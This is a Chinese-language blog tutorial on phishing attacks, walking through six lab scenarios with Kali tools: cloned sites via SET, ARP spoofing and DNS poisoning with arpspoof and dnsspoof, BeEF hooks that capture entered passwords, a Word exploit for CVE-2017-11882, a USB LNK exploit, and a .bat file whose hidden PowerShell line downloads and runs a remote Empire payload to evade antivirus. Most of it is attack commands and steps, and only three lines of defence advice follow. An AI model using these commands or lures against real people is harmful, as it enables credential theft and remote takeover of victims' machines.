花式钓鱼法

0x00. 闲谈

  最近我们小组招新群里居然有人利用邮箱群发功能进行社工钓鱼,最奇葩的是居然还有人中招了,是可忍孰不可忍,千钧一发之际正当我准备祭出珍藏已久的Nmap打算搞死幕后黑手的时候,他她它居然把服务器关了,看来还是有准备的。如果不是没有酿成严重后果,我们绝对不会善罢甘休,光他暴露的IP就足够我们溯源追踪了,下面我也来给大家演示一下如何钓鱼和预防钓鱼陷阱。

0x01. 环境配置

1). 环境准备:

1. kali linux(dnsspoof、arpspoof、setookit、metersploit、beef、Empire)

2. windows xp

3. window 7

情景一:

利用Java Applet 进行钓鱼,不过现在的浏览器已经开始禁止这些插件了,要利用这种情景最好先做好前期的信息收集,判断目标是否支持Java Applet

第一步:下载最新的 setookit 工具包,也可以使用kali自带的S.E.T

git clone https://github.com/trustedsec/social-engineer-toolkit.git

第二步:配置JAVA REAPETER = ON 让基于Java Applet 的警告窗不停的弹出,使攻击更容易成功

vim /etc/setoolkit/set.config

第三步:启动setookit 构造钓鱼页面,成功启动之后会建立一个监听

setookit

依次按照如下顺序:1 2 1 2 no 回车 2 www.baidu.com 1 443 1

第四步:配置metasploit 设置自动迁移进程,避免钓鱼网站被关导致连接中断,同时设置持续监听

kill 0

set exitonsession false

set autorunscript migrate -f

run -j

第五步:钓鱼网址已经上线,只等鱼儿上钩了(笔者的浏览器也不支持Java Applet 所以看不到具体效果,不过克隆的百度除了域名外其他都是一模一样的)


情景二:

利用浏览器漏洞和中间人攻击进行钓鱼,不过这个漏洞已经比较老了,笔者只在xp上成功过,不过这里提供一种思路,万一哪天IE又抽风来个CVE…

第一步:启动setookit 构造钓鱼页面,成功启动之后会建立一个监听

setookit

依次按照如下顺序:1 2 2 1 no 回车 5 37 2 443

第二步:默认会使用本地的8080端口,但这并不是我们所期望的。kill掉此时的job重新启动一个

kill 0

set srvport 80

set exitonsession false

set autorunscript migrate -f

run -j

第三步:此时可以直接将网址甩给目标,但是别人不一定会点开啊。于是我准备利用中间人攻击加DNS投毒强行让目标打开我们构造钓鱼页面,就是这么霸道\^o^,原理大家可以参考我这篇文章

echo 1 > /proc/sys/net/ipv4/ip_forward && arpspoof -t 192.168.1.110 -r 192.168.1.1

echo “192.168.1.111 *.wmpic.me” > dnsspoof.host && dnsspoof -i eth0 -f dnsspoof.host

[*]进行DNS投毒时经常会失败,笔者对这种情况也有点不解,不过当我用xp的IE浏览器访问http://hack.wmpic.me时还是成功被重定向到我们构造的http://192.168.1.111页面,msf成功getshell


情景三:

钓鱼页面与beef结合,让鱼儿无处可逃

第一步:启动setookit 构造钓鱼页面

setookit

依次按照如下顺序:1 2 3 1 local IP(192.168.1.111) 5

第二步:启动beef,将HOOK代码嵌入钓鱼页面

vim ~/.set/web_clone/index.html

第四步:通过社工让鱼儿访问我们的钓鱼页面,如果鱼儿输入账号密码就会将它们发送到我们的kali上

http://192.168.1.111

第五步:回到kali查看效果,可以看到beef已经收到回连,后续阶段大家自己”意淫”吧!


情景四:

利用最新的word漏洞CVE-2017-11882钓鱼

第一步:下载EXP,并将EXP集成到msf的fileformat模块当中

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb

mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

第二步:启动msf生成钓鱼word

reload_all

use exploit/windows/fileformat/office_ms17_11882

第三步:此时可以将girlfriend.word直接发送给鱼儿,也可以发送网址,让他们自己下载,不过msf提供的web server不太好用,下载的文件没有扩展名。我们也可以自己搭建web server,我比较懒就直接将word拖到win 7上去了


情景五:

利用windows自带的powershell进行钓鱼,即发送bat文件,并将payload放到远程服务器,这样在一定程度上可以绕过杀软

第一步:下载并安装Empire,这里有Empire详细的使用教程

git clone https://github.com/EmpireProject/Empire

第二步:启动Empire生成payload

launcher powershell times0ng

第三步:启动Apache2,并将payload源码放到根目录的empire.psl文件中

service apache2 start

vim /var/www/html/empire.psl

第四步:构造一个empire.bat文件作为钓鱼文件,当靶机执行此bat文件时就会自动去我们的server下载对应的payload,这样就不必将payload直接发送给靶机,这在一定程度上可以绕过杀软

powershell -ExecutionPolicy Bypass -w hidden IEX(New-Object Net.Webclient).DownloadString(‘http://192.168.1.109/empire.psl‘)

第五步:通过邮件或者社工的方式将empire.bat发送给鱼儿钓鱼啦,一旦不小心双击运行就成功上钩


情景六:

利用USB社工钓鱼,记得当初看黑客军团时里面的黑客小姐姐就是利用BadUSB加社工黑进监狱的

第一步:利用msf生成攻击向量

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

第二步:将攻击向量放到USB中,并启动msf监听

第三步:打开USB,因为笔者是个穷学生使用的不是BadUSB所以里面的文件不会自动执行,这里需要我手动运行


0x02. 防御建议

[*] 多了解攻击手段,以攻代防,知己知彼

[*] 不要轻易打开任何可执行文件

[*] 不要轻易点击陌生链接

0x03. 结语

  网络钓鱼的花招千奇百怪,可谓大千世界无奇不有,但也不必总是如履薄冰,多看看多学学就不会那么轻易的成为别人的肉鸡了…

文章目录
  1. 1. 0x00. 闲谈
    1. 1.0.1.   最近我们小组招新群里居然有人利用邮箱群发功能进行社工钓鱼,最奇葩的是居然还有人中招了,是可忍孰不可忍,千钧一发之际正当我准备祭出珍藏已久的Nmap打算搞死幕后黑手的时候,他她它居然把服务器关了,看来还是有准备的。如果不是没有酿成严重后果,我们绝对不会善罢甘休,光他暴露的IP就足够我们溯源追踪了,下面我也来给大家演示一下如何钓鱼和预防钓鱼陷阱。
  • 2. 0x01. 环境配置
    1. 2.1. 1). 环境准备:
    2. 2.2. 1. kali linux(dnsspoof、arpspoof、setookit、metersploit、beef、Empire)
    3. 2.3. 2. windows xp
    4. 2.4. 3. window 7
  • 情景一:
    1. 0.0.1. 第一步:下载最新的 setookit 工具包,也可以使用kali自带的S.E.T
    2. 0.0.2. 第二步:配置JAVA REAPETER = ON 让基于Java Applet 的警告窗不停的弹出,使攻击更容易成功
    3. 0.0.3. 第三步:启动setookit 构造钓鱼页面,成功启动之后会建立一个监听
    4. 0.0.4. 第四步:配置metasploit 设置自动迁移进程,避免钓鱼网站被关导致连接中断,同时设置持续监听
    5. 0.0.5. 第五步:钓鱼网址已经上线,只等鱼儿上钩了(笔者的浏览器也不支持Java Applet 所以看不到具体效果,不过克隆的百度除了域名外其他都是一模一样的)
  • 情景二:
    1. 0.0.1. 第一步:启动setookit 构造钓鱼页面,成功启动之后会建立一个监听
    2. 0.0.2. 第二步:默认会使用本地的8080端口,但这并不是我们所期望的。kill掉此时的job重新启动一个
    3. 0.0.3. 第三步:此时可以直接将网址甩给目标,但是别人不一定会点开啊。于是我准备利用中间人攻击加DNS投毒强行让目标打开我们构造钓鱼页面,就是这么霸道\^o^,原理大家可以参考我这篇文章
  • 情景三:
    1. 0.0.1. 第一步:启动setookit 构造钓鱼页面
    2. 0.0.2. 第二步:启动beef,将HOOK代码嵌入钓鱼页面
    3. 0.0.3. 第四步:通过社工让鱼儿访问我们的钓鱼页面,如果鱼儿输入账号密码就会将它们发送到我们的kali上
    4. 0.0.4. 第五步:回到kali查看效果,可以看到beef已经收到回连,后续阶段大家自己”意淫”吧!
  • 情景四:
    1. 0.0.1. 第一步:下载EXP,并将EXP集成到msf的fileformat模块当中
    2. 0.0.2. 第二步:启动msf生成钓鱼word
    3. 0.0.3. 第三步:此时可以将girlfriend.word直接发送给鱼儿,也可以发送网址,让他们自己下载,不过msf提供的web server不太好用,下载的文件没有扩展名。我们也可以自己搭建web server,我比较懒就直接将word拖到win 7上去了
  • 情景五:
    1. 0.0.1. 第一步:下载并安装Empire,这里有Empire详细的使用教程
    2. 0.0.2. 第二步:启动Empire生成payload
    3. 0.0.3. 第三步:启动Apache2,并将payload源码放到根目录的empire.psl文件中
    4. 0.0.4. 第四步:构造一个empire.bat文件作为钓鱼文件,当靶机执行此bat文件时就会自动去我们的server下载对应的payload,这样就不必将payload直接发送给靶机,这在一定程度上可以绕过杀软
    5. 0.0.5. 第五步:通过邮件或者社工的方式将empire.bat发送给鱼儿钓鱼啦,一旦不小心双击运行就成功上钩
  • 情景六:
    1. 0.0.1. 第一步:利用msf生成攻击向量
    2. 0.0.2. 第二步:将攻击向量放到USB中,并启动msf监听
    3. 0.0.3. 第三步:打开USB,因为笔者是个穷学生使用的不是BadUSB所以里面的文件不会自动执行,这里需要我手动运行
  • 1. 0x02. 防御建议
    1. 1.0.1. [*] 多了解攻击手段,以攻代防,知己知彼
    2. 1.0.2. [*] 不要轻易打开任何可执行文件
    3. 1.0.3. [*] 不要轻易点击陌生链接
  • 2. 0x03. 结语
    1. 2.0.1.   网络钓鱼的花招千奇百怪,可谓大千世界无奇不有,但也不必总是如履薄冰,多看看多学学就不会那么轻易的成为别人的肉鸡了…
  • |